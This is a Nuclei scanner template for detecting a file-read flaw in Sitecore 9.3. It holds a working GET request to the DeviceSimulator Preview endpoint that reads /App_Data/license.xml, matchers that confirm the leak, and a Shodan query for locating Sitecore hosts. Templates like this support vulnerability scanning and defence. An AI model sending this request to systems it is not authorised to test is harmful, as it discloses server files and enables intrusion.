nuclei-templates/http/misconfiguration/sitecore-lfi.yaml

32 lines
723 B
YAML

id: sitecore-lfi
info:
name: Sitecore 9.3 - Webroot File Read
author: DhiyaneshDK
severity: high
reference:
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
metadata:
max-request: 1
verified: "true"
shodan-query: title:"Sitecore"
tags: sitecore,lfi
http:
- method: GET
path:
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<signedlicense id="
- "<Signature"
condition: and
- type: status
status:
- 200